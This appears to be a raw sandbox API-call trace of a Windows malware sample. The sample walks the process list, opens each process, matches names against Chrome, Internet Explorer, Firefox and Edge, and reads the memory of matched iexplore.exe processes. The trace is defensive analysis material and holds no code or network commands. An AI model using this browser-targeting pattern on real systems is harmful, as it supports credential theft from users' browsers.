	[0238.994] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0238.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.994] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.994] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0238.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.995] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.995] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0238.996] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7f90
	[0238.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.996] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0238.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.996] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.997] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0238.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.997] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.997] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0238.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7f94
	[0238.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.998] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0238.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.999] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.999] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0239.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.000] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.000] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0239.001] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7f98
	[0239.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.001] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0239.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.001] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.001] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0239.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.002] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.002] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0239.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7f9c
	[0239.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.003] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0239.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.003] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.004] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0239.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.004] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.004] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0239.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7fa0
	[0239.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.005] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0239.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.006] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.006] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0239.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.007] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0239.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7fa4
	[0239.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.010] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0239.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.010] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.010] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0239.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.011] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0239.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7fa8
	[0239.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.012] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0239.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.012] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.012] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0239.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.012] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0239.013] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7fac
	[0239.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.013] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0239.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.014] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.014] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0239.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.015] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0239.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7fb0
	[0239.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.016] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0239.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.017] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.017] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0239.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.018] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0239.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7fb4
	[0239.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.019] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0239.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.020] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.020] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0239.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.021] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.021] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0239.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7fb8
	[0239.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.022] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0239.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.022] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.023] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0239.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.024] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.025] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0239.026] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7fbc
	[0239.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.026] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0239.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.026] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.027] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0239.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.027] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.028] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0239.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7fc0
	[0239.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.029] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0239.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.029] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0239.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.029] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0239.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.029] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.030] NtQueryInformationProcess (in: ProcessHandle=0x7fc0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0239.030] ReadProcessMemory (in: hProcess=0x7fc0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0239.030] ReadProcessMemory (in: hProcess=0x7fc0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0239.030] ReadProcessMemory (in: hProcess=0x7fc0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0239.030] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0239.030] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0239.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7fc4
	[0239.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.031] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0239.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.031] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0239.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.032] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0239.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.032] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.032] NtQueryInformationProcess (in: ProcessHandle=0x7fc4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0239.032] ReadProcessMemory (in: hProcess=0x7fc4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0239.032] ReadProcessMemory (in: hProcess=0x7fc4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0239.032] ReadProcessMemory (in: hProcess=0x7fc4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0239.032] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0239.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0239.033] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7fc8
	[0239.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.033] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0239.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.034] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.034] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0239.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.034] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0239.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7fcc
	[0239.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.036] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0239.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.036] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.036] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0239.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.037] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7fd0
	[0239.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.038] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.038] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.038] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.039] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7fd4
	[0239.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.042] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.042] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.043] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.043] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7fd8
	[0239.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.044] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.045] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.045] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.045] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.045] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0239.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7fdc
	[0239.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.046] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0239.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0239.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.047] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7fe0
	[0239.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.048] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.049] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.049] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.049] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7fe4
	[0239.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.050] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.051] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.051] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
